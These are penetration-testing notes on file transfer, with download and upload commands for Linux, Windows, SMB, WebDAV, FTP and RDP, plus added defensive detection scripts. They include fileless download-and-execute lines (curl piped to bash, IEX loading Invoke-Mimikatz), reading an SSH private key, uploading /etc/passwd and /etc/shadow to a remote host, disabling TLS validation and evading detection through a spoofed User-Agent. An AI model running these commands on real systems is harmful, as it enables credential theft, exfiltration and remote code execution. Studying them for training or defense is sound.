# File Transfers

## Download Operations

## Terminal String Copy & Paste

### Linux Encode Base64

{% code overflow="wrap" %}

```
cat id_rsa |base64 -w 0;echo
```

{% endcode %}

<figure><img src="/files/zf6dfNCYOKMBGL8f5qdc" alt=""><figcaption></figcaption></figure>

### Windows Decode & Write Base64

{% code overflow="wrap" %}

```
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING"))
```

{% endcode %}

<figure><img src="/files/P0qUHkTZKOm4bIha8ObN" alt=""><figcaption><p>cmd.exe has a maximum string length of 8,191 characters, and powershell.exe has a maximum string length of 2,147,483,647 characters.</p></figcaption></figure>
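
The length limits in the caption above matter because a Base64 string that is cut short at paste time can still decode without an error. The following is an added example, not part of the original notes, that simulates the truncation and checks the decoded bytes against a SHA-256 digest of the source. The helper names, the 7,000-byte sample and the choice of SHA-256 are assumptions made for illustration.

```python
import base64
import hashlib

CMD_MAX = 8191            # cmd.exe limit quoted in the caption above
PS_MAX = 2_147_483_647    # powershell.exe limit quoted in the caption above


def encoded_len(n_bytes: int) -> int:
    """Length of the padded Base64 text for n_bytes of input."""
    return 4 * ((n_bytes + 2) // 3)


def max_file_size(limit: int, wrapper_len: int = 0) -> int:
    """Largest file whose Base64 text, plus wrapper_len characters of
    surrounding command text, still fits within `limit` characters."""
    return max(0, (limit - wrapper_len) // 4 * 3)


def paste_and_verify(b64_text: str, expected_sha256: str, limit: int) -> str:
    """Simulate a paste that keeps only `limit` characters, then decode
    the result and compare it with the digest taken on the source host."""
    pasted = b64_text[:limit]
    try:
        decoded = base64.b64decode(pasted, validate=True)
    except ValueError:
        return "decode-error"      # cut inside a 4-character group: loud failure
    if hashlib.sha256(decoded).hexdigest() != expected_sha256:
        return "hash-mismatch"     # decoded cleanly, but the file is incomplete
    return "ok"


# Constructed sample: 7,000 bytes standing in for the file being transferred.
sample = bytes(range(256)) * 27 + bytes(88)
digest = hashlib.sha256(sample).hexdigest()
text = base64.b64encode(sample).decode()

if __name__ == "__main__":
    print(len(text), paste_and_verify(text, digest, CMD_MAX))
    print(paste_and_verify(text, digest, 8188))
    print(paste_and_verify(text, digest, PS_MAX))
    print(max_file_size(CMD_MAX))
```

A cut at a multiple of four characters is the silent case: the decoder accepts it, and only the digest comparison shows that the written file is short.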

## Web Downloads with Wget & cURL

### **Download a File Using wget**

{% code overflow="wrap" %}

```
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
```

{% endcode %}

<figure><img src="/files/gIsEGUg9Io5aEFRg24Vj" alt=""><figcaption></figcaption></figure>

### **Fileless Download with wget**

{% code overflow="wrap" %}

```
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
```

{% endcode %}

<figure><img src="/files/rfCQUe3sfc019QJ20DtV" alt=""><figcaption></figcaption></figure>

### **Download a File Using cURL**

{% code overflow="wrap" %}

```
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
```

{% endcode %}

<figure><img src="/files/Cb489NA1HMng2t3ia4XW" alt=""><figcaption></figcaption></figure>

### **Fileless Download with cURL**

{% code overflow="wrap" %}

```
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
```

{% endcode %}

<figure><img src="/files/51eWPLdb2XKuy7tPi0mS" alt=""><figcaption></figcaption></figure>

## Download with Bash (/dev/tcp)

### **Connect to the Target Webserver**

{% code overflow="wrap" %}

```
exec 3<>/dev/tcp/10.10.10.32/80
```

{% endcode %}

<figure><img src="/files/sFzLUDw9iarmJflq3TtG" alt=""><figcaption></figcaption></figure>

### **HTTP GET Request**

{% code overflow="wrap" %}

```
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

{% endcode %}

<figure><img src="/files/RLzISBO2gXjpGRToc8aV" alt=""><figcaption></figcaption></figure>

### **Print the Response**

{% code overflow="wrap" %}

```
cat <&3
```

{% endcode %}

<figure><img src="/files/KHC2czwWfmTdC5EhlToH" alt=""><figcaption></figcaption></figure>

## PowerShell Web Downloads

### **DownloadFile Method**

{% code overflow="wrap" %}

```
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
```

{% endcode %}

<figure><img src="/files/U22MM2Tcz0qtEDr1ye3B" alt=""><figcaption></figcaption></figure>

### **DownloadString - Fileless Method**

{% code overflow="wrap" %}

```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
```

{% endcode %}

<figure><img src="/files/5hzmcMi3IeQpCjwg6pWU" alt=""><figcaption></figcaption></figure>

### **Invoke-WebRequest**

{% code overflow="wrap" %}

```
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
```

{% endcode %}

<figure><img src="/files/DGccZ6ZEAQFQV52x691B" alt=""><figcaption><p>You can use the aliases <code>iwr</code>, <code>curl</code>, and <code>wget</code> instead of the <code>Invoke-WebRequest</code> full name</p></figcaption></figure>

### **Common Errors with PowerShell**

<figure><img src="/files/D1cSRcDH4aaex4SMnznb" alt=""><figcaption><p>There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing</p></figcaption></figure>

{% code overflow="wrap" %}

```
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
```

{% endcode %}

<figure><img src="/files/9f5PHwQQiQerdTRRJHl8" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```powershell-session
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
```

{% endcode %}

<figure><img src="/files/X68x9gI1LFOFmQrfv3iw" alt=""><figcaption><p>Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command</p></figcaption></figure>

{% code overflow="wrap" %}

```
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

{% endcode %}
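
For defenders, the download commands and the certificate-validation override in this section leave recognizable text in PowerShell script block logging. The following is an added example, not part of the original notes, that matches them, including the `iwr`, `curl` and `wget` aliases mentioned above. The rule names, host names and `example.internal` URLs are made up for the sample.

```python
import re

# Invoke-WebRequest and the aliases listed on this page.
IWR = r"(?:invoke-webrequest|iwr|curl|wget)"
IEX = r"(?:iex|invoke-expression)"

# Rule names are labels invented for this example.
RULES = [
    ("download-string-executed",
     re.compile(rf"\b{IEX}\b.*\.downloadstring\(|\.downloadstring\(.*\|\s*{IEX}\b", re.I)),
    ("web-request-piped-to-iex",
     re.compile(rf"\b{IWR}\b[^|]*\|\s*{IEX}\b", re.I)),
    ("tls-validation-disabled",
     re.compile(r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    # Lower fidelity: writing a file through WebClient is also done by admins.
    ("webclient-file-write",
     re.compile(r"net\.webclient\)?\.downloadfile\(", re.I)),
]


def scan(script_blocks):
    """Return (host, rule) pairs for every rule a script block matches."""
    hits = []
    for host, text in script_blocks:
        for name, rx in RULES:
            if rx.search(text):
                hits.append((host, name))
    return hits


# Constructed script block log entries as (host, script text) pairs.
SAMPLE = [
    ("ws01", "IEX (New-Object Net.WebClient).DownloadString('https://example.internal/a.ps1')"),
    ("ws02", "iwr https://example.internal/b.ps1 -UseBasicParsing | iex"),
    ("ws03", "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"),
    ("ws04", "(New-Object Net.WebClient).DownloadFile('https://example.internal/c.bin','c.bin')"),
    ("ws05", "Invoke-WebRequest https://example.internal/report.csv -OutFile report.csv"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The last sample entry is an ordinary download to disk and matches no rule, which is the behaviour to preserve when tuning these patterns.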

## SMB Downloads

### **Create the SMB Server**

{% code overflow="wrap" %}

```
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

{% endcode %}

<figure><img src="/files/ehW5LmpmVTImWL1htBsy" alt=""><figcaption></figcaption></figure>

### Copy a File from the SMB Server

{% code overflow="wrap" %}

```
copy \\192.168.220.133\share\nc.exe
```

{% endcode %}

<figure><img src="/files/w3RjNwHF8GT6jv6nrDKX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2VMBPvaior0BiR6gUmUa" alt=""><figcaption><p>New versions of Windows block unauthenticated guest access</p></figcaption></figure>

### **Create the SMB Server with Username & Password**

{% code overflow="wrap" %}

```
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

{% endcode %}

<figure><img src="/files/BNLuvWXYjd9CmuCNpcDX" alt=""><figcaption></figcaption></figure>

### **Mount the SMB Server with Username and Password**

{% code overflow="wrap" %}

```
net use n: \\192.168.220.133\share /user:test test
```

{% endcode %}

<figure><img src="/files/pEI3f8KyUiJgW9U4UUut" alt=""><figcaption><p>You can also mount the SMB server if you receive an error when you use <code>copy filename \\IP\sharename</code>.</p></figcaption></figure>

## FTP Downloads

### **Installing the FTP Server Python3 Module - pyftpdlib**

{% code overflow="wrap" %}

```
sudo pip3 install pyftpdlib
```

{% endcode %}

<figure><img src="/files/Vwm34cJ5SBVeOdH8BdG5" alt=""><figcaption></figcaption></figure>

### **Setting up a Python3 FTP Server**

{% code overflow="wrap" %}

```
sudo python3 -m pyftpdlib --port 21
```

{% endcode %}

<figure><img src="/files/gDl2Nw8OaMjRQROrWaSl" alt=""><figcaption></figcaption></figure>

### **Transferring Files from an FTP Server Using PowerShell**

{% code overflow="wrap" %}

```
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
```

{% endcode %}

<figure><img src="/files/mbnsyL0RZxWF50ZBmbuQ" alt=""><figcaption></figcaption></figure>

### **Command File for FTP Client To Download File**

{% code overflow="wrap" %}

```
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
```

{% endcode %}

<figure><img src="/files/LZINAxwTVyIGOt1naYjZ" alt=""><figcaption><p>You may not have an interactive shell. If that's the case, we can create an FTP command file to download a file</p></figcaption></figure>

## Upload Operations

## Terminal String Copy & Paste

### Windows Encode & Write Base64

{% code overflow="wrap" %}

```
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
```

{% endcode %}

<figure><img src="/files/WOAT7UARiyNo7to3lXI1" alt=""><figcaption></figcaption></figure>

### Linux Decode Base64

{% code overflow="wrap" %}

```
echo Base64string | base64 -d > hosts
```

{% endcode %}

<figure><img src="/files/wjAcIMnVTlp0darKXu5M" alt=""><figcaption></figcaption></figure>

## Web Uploads with cURL

{% code overflow="wrap" %}

```
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

{% endcode %}

<figure><img src="/files/XutewBbs5ppBbZqO3Gvx" alt=""><figcaption></figcaption></figure>

## PowerShell Web Uploads

### **Installing a Configured WebServer with Upload**

{% code overflow="wrap" %}

```
pip3 install uploadserver
```

{% endcode %}

```
python3 -m uploadserver
```

<figure><img src="/files/59UNdiy3j8tsooFDTmCU" alt=""><figcaption></figcaption></figure>

### **PowerShell Script to Upload a File to Python Upload Server**

{% code overflow="wrap" %}

```
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
```

{% endcode %}

{% code overflow="wrap" %}

```
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
```

{% endcode %}

<figure><img src="/files/wFJXJ0wsLv2sLdTlUp9U" alt=""><figcaption></figcaption></figure>

### PowerShell Base64 Web Upload

{% code overflow="wrap" %}

```
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
```

{% endcode %}

{% code overflow="wrap" %}

```
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

{% endcode %}

<figure><img src="/files/cwtqL9FqfFV9XmxT1JEh" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
nc -lvnp 8000
```

{% endcode %}

<figure><img src="/files/trxx2CYL1EvdTycHiZVi" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
echo '<base64>' | base64 -d > hosts
```

{% endcode %}

## SMB Uploads

<figure><img src="/files/ubPf0GryyWytmzYsnNIX" alt=""><figcaption><p>Enterprises commonly don't allow the SMB protocol (TCP/445). An alternative is to run SMB over HTTP with <code>WebDAV</code>. When you use <code>SMB</code>, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.</p></figcaption></figure>

### **Installing WebDAV Python Modules**

{% code overflow="wrap" %}

```
sudo pip3 install wsgidav cheroot
```

{% endcode %}

<figure><img src="/files/QQv4UwB0ObkuM2u7Gomc" alt=""><figcaption></figcaption></figure>

### **Using the WebDAV Python Module**

{% code overflow="wrap" %}

```
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

{% endcode %}

<figure><img src="/files/EdfXrLVYvKyEjYlcM4qj" alt=""><figcaption></figcaption></figure>

### **Connecting to the WebDAV Share**

{% code overflow="wrap" %}

```
dir \\192.168.49.128\DavWWWRoot
```

{% endcode %}

<figure><img src="/files/fZUQS5n4cSkUVeMwooFM" alt=""><figcaption><p>DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: <code>\\192.168.49.128\sharefolder</code></p></figcaption></figure>

### **Uploading Files using SMB**

{% code overflow="wrap" %}

```
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
```

{% endcode %}

{% code overflow="wrap" %}

```
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
```

{% endcode %}

<figure><img src="/files/Wg6ZRiv8ebPope4KZ105" alt=""><figcaption><p>If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.</p></figcaption></figure>

### FTP Uploads

```
sudo python3 -m pyftpdlib --port 21 --write
```

<figure><img src="/files/7yIoAryuTH4FgNuittBD" alt=""><figcaption><p>You need to specify the option <code>--write</code> to allow clients to upload files to our attack host.</p></figcaption></figure>

### **PowerShell Upload File**

{% code overflow="wrap" %}

```
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

{% endcode %}

<figure><img src="/files/6UDSQTbdjwUdxBPyjoK6" alt=""><figcaption></figcaption></figure>

### **Command File for FTP Client to Upload File**

{% code overflow="wrap" %}

```
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
```

{% endcode %}

<figure><img src="/files/lYhEjqKj4yCE5x3Xqi0v" alt=""><figcaption></figcaption></figure>

## **Mounting a Linux Folder With RDP**

### **Mounting Using rdesktop**

{% code overflow="wrap" %}

```
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

{% endcode %}

<figure><img src="/files/1YFQjPU13zeAt9Hg04Nb" alt=""><figcaption></figcaption></figure>

### **Mounting Using xfreerdp**

{% code overflow="wrap" %}

```
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

{% endcode %}

<figure><img src="/files/0ef5ig0H0TMa9ikUdtDC" alt=""><figcaption></figcaption></figure>

## Evading Detection

### **Listing out User Agents**

{% code overflow="wrap" %}

```
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
```

{% endcode %}

<figure><img src="/files/seRbOLmN5Oxev9dobUPC" alt=""><figcaption></figcaption></figure>

### **Request with Chrome User Agent**

{% code overflow="wrap" %}

```
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
```

{% endcode %}

{% code overflow="wrap" %}

```
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
```

{% endcode %}

<figure><img src="/files/Y3FwbZCMoU9bhIPFVK7t" alt=""><figcaption></figcaption></figure>

### **Transferring File with GfxDownloadWrapper.exe**

{% code overflow="wrap" %}

```
GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
```

{% endcode %}

<figure><img src="/files/NgESFH8wWMcNhTo0wRof" alt=""><figcaption></figcaption></figure>
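
Changing the User-Agent only alters what a proxy sees; endpoint telemetry still records which process opened the connection. The following is an added example, not part of the original notes, that joins constructed proxy records to constructed endpoint connection records and reports a browser User-Agent sent by a non-browser process. The field names, addresses, User-Agent strings and the list of browser executables are assumptions, as is a proxy that logs the client source port.

```python
# Executables each claimed browser family is expected to run as (assumed list).
EXPECTED_IMAGE = {"chrome": {"chrome.exe"}, "firefox": {"firefox.exe"},
                  "edge": {"msedge.exe"}}


def ua_family(user_agent):
    """Return the browser a User-Agent string claims to be, or None."""
    ua = user_agent.lower()
    if "edg/" in ua:
        return "edge"      # Edge strings also contain "chrome/", so test first
    if "firefox/" in ua:
        return "firefox"
    if "chrome/" in ua:
        return "chrome"
    return None


def find_mismatches(proxy_rows, endpoint_rows):
    """Join proxy rows to endpoint rows on (src_ip, src_port) and report
    requests whose claimed browser does not match the owning process."""
    owner = {(e["src_ip"], e["src_port"]): e["image"].rsplit("\\", 1)[-1].lower()
             for e in endpoint_rows}
    findings = []
    for p in proxy_rows:
        family = ua_family(p["user_agent"])
        image = owner.get((p["src_ip"], p["src_port"]))
        if family and image and image not in EXPECTED_IMAGE[family]:
            findings.append((p["src_ip"], image, family, p["url"]))
    return findings


# Constructed sample data; addresses, ports, URLs and UA strings are made up.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
PROXY = [
    {"src_ip": "10.0.0.5", "src_port": 50112, "user_agent": CHROME_UA,
     "url": "http://files.example.internal/tool.bin"},
    {"src_ip": "10.0.0.6", "src_port": 50200, "user_agent": CHROME_UA,
     "url": "http://intranet.example.internal/"},
]
ENDPOINT = [
    {"src_ip": "10.0.0.5", "src_port": 50112,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"src_ip": "10.0.0.6", "src_port": 50200,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]

if __name__ == "__main__":
    print(find_mismatches(PROXY, ENDPOINT))
```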

